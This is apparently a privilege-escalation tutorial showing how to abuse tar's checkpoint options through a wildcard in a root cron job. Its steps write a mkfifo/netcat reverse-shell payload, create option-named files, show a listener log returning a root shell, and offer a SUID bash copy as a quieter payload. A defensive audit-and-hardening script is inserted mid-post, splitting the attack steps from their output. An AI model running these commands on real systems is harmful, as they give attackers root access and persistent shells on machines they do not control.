Wildcards, Tar and Checkpoints

Tar comes with a feature called “checkpoints” that allows periodic execution of actions at certain points of the archiving process. An example may be a large tar backup running on a cron job that periodically emails its progress after every 10,000th file has been archived. If that tar job uses a wildcard to back up a directory, then we can inject our own checkpoint into the tar job that will execute our own code. This works because the shell expands the wildcard into a list of file names before tar ever runs, and tar parses any argument beginning with -- as an option, so a file named --checkpoint=1 is indistinguishable from the real flag.

Exploit

You find this cron job running as the super user every 5 minutes. The script utilises a wildcard and the /home/backups folder is writable. Perfect for inserting a tar checkpoint.

-rw-r--r-- 1 root root 62 Oct 24 20:52 backup_files.sh

#!/bin/bash

cd /home/backups
tar cvf /tmp/backup_files.tar *

Steps

  1. Create the malicious payload.
    echo -n "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f" > /home/backups/runme.sh
  2. Create the checkpoint.
    touch /home/backups/--checkpoint=1
  3. Create the action to perform when the checkpoint is hit.
    touch /home/backups/--checkpoint-action=exec=sh\ runme.sh

Now the next time the cron runs the backup_files.sh script, the checkpoint will be hit and our runme.sh script will run with the privileges of the user that runs backup_files.sh, which here is root.
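The following script is an added example and is not code from the original post. It shows, from the defender's side, the root cause the technique relies on (a bare * handing option-shaped file names to tar), an audit function that a cron job can run before archiving to refuse a directory containing such names, and a hardened form of the backup line that keeps file names out of tar's option parser. It assumes POSIX sh and tar(1); the directory and file names it creates are constructed temporaries, not the post's /home/backups, and the --checkpoint-action file it creates is inert because it is never passed to tar as an option.

```shell
#!/bin/sh
# Added example, not code from the original post. Demonstrates why a bare
# wildcard is unsafe in front of tar, how to audit a directory for
# option-shaped names, and a hardened backup line. Assumes POSIX sh and tar(1).

# Print the arguments the shell would pass to "tar cvf out.tar *" when run
# inside "$1", one per line, exactly as tar's option parser would see them.
# (In an empty directory the unmatched glob is printed literally as "*".)
expand_glob() {
    (cd "$1" && for arg in *; do printf '%s\n' "$arg"; done)
}

# Count entries directly inside "$1" whose names begin with "-". A non-zero
# count means a wildcard in that directory is unsafe until those names are
# removed; a backup job can call this and abort (and alert) when it is non-zero.
count_option_like_names() {
    n=0
    for entry in "$1"/-*; do
        [ -e "$entry" ] || continue     # unmatched glob stays literal; skip it
        n=$((n + 1))
    done
    printf '%s\n' "$n"
}

# Hardened replacement for "cd /home/backups; tar cvf /tmp/backup_files.tar *".
# Prefixing the glob with "./" makes every expanded name start with "./", so a
# file called "--checkpoint=1" reaches tar as the file name "./--checkpoint=1";
# the "--" additionally ends option parsing. Prints the archive's member list.
safe_backup() {
    dir=$1 out=$2
    (cd "$dir" && tar cf "$out" -- ./*) || return 1
    tar tf "$out"
}

demo() {
    command -v tar >/dev/null 2>&1 || { echo "tar not available, skipping demo"; return 0; }
    work=$(mktemp -d)                   # constructed temporary location
    mkdir "$work/backups"
    : > "$work/backups/data.txt"
    # Constructed, inert file names with the shape the post describes. They are
    # never passed to tar as options here, only handled as file names.
    : > "$work/backups/--checkpoint=1"
    : > "$work/backups/--checkpoint-action=echo"

    echo "arguments a bare * would hand to tar:"
    expand_glob "$work/backups"

    echo "option-like names found: $(count_option_like_names "$work/backups")"

    echo "members archived by the hardened command:"
    safe_backup "$work/backups" "$work/backup_files.tar"

    rm -rf "$work"
}

demo
```

In the demo output the first list shows --checkpoint=1 arriving as a bare argument, which is exactly what the original cron line passes to tar, while the hardened command archives the same entry under the name ./--checkpoint=1 and never interprets it. Running count_option_like_names as a guard at the top of a backup script, and alerting when it is non-zero, turns the injection attempt itself into a detectable event; the writable backup directory is the other half of the fix and should not be world-writable in the first place.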

nc -lnvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55592
# id
uid=0(root) gid=0(root) groups=0(root),141(kaboxer)

For a less noisy payload you can copy /bin/bash to /tmp with the SUID bit set.

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/backups/runme.sh